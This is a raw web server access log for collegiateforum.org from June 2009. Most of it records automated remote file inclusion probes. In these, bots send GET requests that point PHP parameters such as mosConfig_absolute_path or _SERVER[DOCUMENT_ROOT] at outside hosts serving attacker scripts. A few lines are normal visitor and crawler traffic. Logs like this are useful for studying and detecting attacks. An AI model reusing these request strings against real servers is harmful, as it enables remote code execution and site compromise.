195.34.78.110 - - [29/Jun/2009:00:20:23 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:20:48 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:20:48 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:20:51 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:21:38 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:21:38 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:21:39 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:00:21:59 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:00:21:59 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:00:21:59 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
110.45.144.34 - - [29/Jun/2009:00:22:06 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
110.45.144.34 - - [29/Jun/2009:00:22:07 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
110.45.144.34 - - [29/Jun/2009:00:22:07 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:23:21 -0700] "GET /logs/index.php?menu=deti&page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:23:21 -0700] "GET /logs/access_090105.log%20%20/index.php?menu=deti&page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:23:21 -0700] "GET /index.php?menu=deti&page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
110.45.144.33 - - [29/Jun/2009:00:23:52 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
110.45.144.33 - - [29/Jun/2009:00:23:53 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:23:53 -0700] "GET /index.php?menu=deti&page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:23:53 -0700] "GET /logs/index.php?menu=deti&page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:23:53 -0700] "GET /logs/access_090105.log%20%20/index.php?menu=deti&page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
110.45.144.33 - - [29/Jun/2009:00:23:53 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:25:27 -0700] "GET /logs/access_090105.log/index.php?menu=deti&page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:25:33 -0700] "GET /logs/access_090105.log/index.php?menu=deti&page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
110.45.144.34 - - [29/Jun/2009:00:26:45 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
110.45.144.34 - - [29/Jun/2009:00:26:45 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
110.45.144.34 - - [29/Jun/2009:00:26:46 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:00:28:57 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:00:28:57 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:00:28:57 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
77.232.68.137 - - [29/Jun/2009:00:29:16 -0700] "GET /include/scripts/export_batch.inc.php?DIR=http://izzynet.110mb.com/tcl/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
77.232.68.137 - - [29/Jun/2009:00:29:17 -0700] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://izzynet.110mb.com/tcl/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
77.232.68.137 - - [29/Jun/2009:00:29:17 -0700] "GET /logs/access_090105.log%20%20//include/scripts/export_batch.inc.php?DIR=http://izzynet.110mb.com/tcl/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
64.34.162.200 - - [29/Jun/2009:00:32:42 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://rox-crime2.no-ip.org:8080/id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
64.34.162.200 - - [29/Jun/2009:00:32:42 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://rox-crime2.no-ip.org:8080/id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
64.34.162.200 - - [29/Jun/2009:00:32:42 -0700] "GET /logs/access_090105.log/admincp/auth/checklogin.php?cfgProgDir=http://rox-crime2.no-ip.org:8080/id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
194.165.34.48 - - [29/Jun/2009:00:35:01 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.165.34.48 - - [29/Jun/2009:00:35:01 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
216.45.56.47 - - [29/Jun/2009:00:35:05 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.45.56.47 - - [29/Jun/2009:00:35:05 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:00:35:48 -0700] "GET /logs/access.log/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://tomato.pooding.com/lib/bankofamerica/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:00:35:51 -0700] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://tomato.pooding.com/lib/bankofamerica/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:00:35:52 -0700] "GET /logs/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://tomato.pooding.com/lib/bankofamerica/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:00:36:32 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:00:36:32 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:00:36:32 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
222.122.6.62 - - [29/Jun/2009:00:37:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
222.122.6.62 - - [29/Jun/2009:00:37:10 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.45.56.47 - - [29/Jun/2009:00:38:13 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
194.165.34.48 - - [29/Jun/2009:00:39:02 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
216.45.56.47 - - [29/Jun/2009:00:39:39 -0700] "GET /logs/access.log%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
222.122.6.62 - - [29/Jun/2009:00:39:40 -0700] "GET /logs/access.log%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
65.55.106.132 - - [29/Jun/2009:00:40:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
194.165.34.48 - - [29/Jun/2009:00:40:37 -0700] "GET /logs/access.log%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
222.122.6.62 - - [29/Jun/2009:00:41:33 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:00:48:16 -0700] "GET /logs/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:00:48:16 -0700] "GET /logs/access.log%20%20/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:00:48:17 -0700] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
110.45.144.33 - - [29/Jun/2009:00:52:50 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
110.45.144.33 - - [29/Jun/2009:00:52:50 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
110.45.144.33 - - [29/Jun/2009:00:52:51 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:53:58 -0700] "GET /Jonathan_Fantini_Porter/index.php HTTP/1.0" 200 23858 "http://www.collegiateforum.org/Jonathan_Fantini_Porter/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:53:59 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:53:59 -0700] "GET /staff HTTP/1.0" 404 275 "http://www.collegiateforum.org/staff" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:53:59 -0700] "GET /staff/collegiateforum HTTP/1.0" 404 275 "http://www.collegiateforum.org/staff/collegiateforum" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:00 -0700] "GET /collegiateforum HTTP/1.0" 404 275 "http://www.collegiateforum.org/collegiateforum" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:00 -0700] "GET /staff/collegiateforum/executiveboard HTTP/1.0" 404 275 "http://www.collegiateforum.org/staff/collegiateforum/executiveboard" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:00 -0700] "GET /collegiateforum/executiveboard HTTP/1.0" 404 275 "http://www.collegiateforum.org/collegiateforum/executiveboard" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:00 -0700] "GET /staff/collegiateforum/executiveboard/president.php HTTP/1.0" 404 275 "http://www.collegiateforum.org/staff/collegiateforum/executiveboard/president.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:01 -0700] "GET /collegiateforum/executiveboard/president.php HTTP/1.0" 404 275 "http://www.collegiateforum.org/collegiateforum/executiveboard/president.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:01 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:01 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:02 -0700] "GET /index.php HTTP/1.0" 404 275 "http://www.collegiateforum.org/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:02 -0700] "GET /collegiateforumfund.php HTTP/1.0" 404 275 "http://www.collegiateforum.org/collegiateforumfund.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
195.2.240.99 - - [29/Jun/2009:00:54:03 -0700] "GET /feed.xml HTTP/1.0" 404 275 "http://www.collegiateforum.org/feed.xml" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:00:55:48 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 936 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:00:55:48 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 5093 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:00:56:50 -0700] "GET /logs/access_090105.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:00:57:01 -0700] "GET /logs/access.log/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:00:57:01 -0700] "GET /logs/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:00:57:08 -0700] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:00:58:05 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:00:58:05 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 936 "-" "libwww-perl/5.805" "collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:00:58:05 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 5093 "-" "libwww-perl/5.805" "collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:00:58:15 -0700] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:00:58:15 -0700] "GET /_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:00:58:15 -0700] "GET /logs/access.log//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:01:00:20 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 936 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:01:00:20 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 5093 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.16.83.70 - - [29/Jun/2009:01:00:24 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
87.16.83.70 - - [29/Jun/2009:01:00:24 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
87.16.83.70 - - [29/Jun/2009:01:00:24 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:01:00:52 -0700] "GET /logs/access_081208.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:01:00:52 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
208.80.195.56 - - [29/Jun/2009:01:01:08 -0700] "GET / HTTP/1.0" 200 918 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=ventura5)" "collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:01:01:31 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:01:02:57 -0700] "GET /logs/access.log%20/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:03:07 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:03:07 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:03:07 -0700] "GET /logs/access_090105.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
87.16.83.70 - - [29/Jun/2009:01:03:27 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:04:03 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:04:03 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:04:03 -0700] "GET /logs/access_090105.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:04:59 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:04:59 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:04:59 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:01:05:22 -0700] "GET /logs/access.log/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:07:51 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:07:51 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:07:52 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:13:35 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:17:50 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
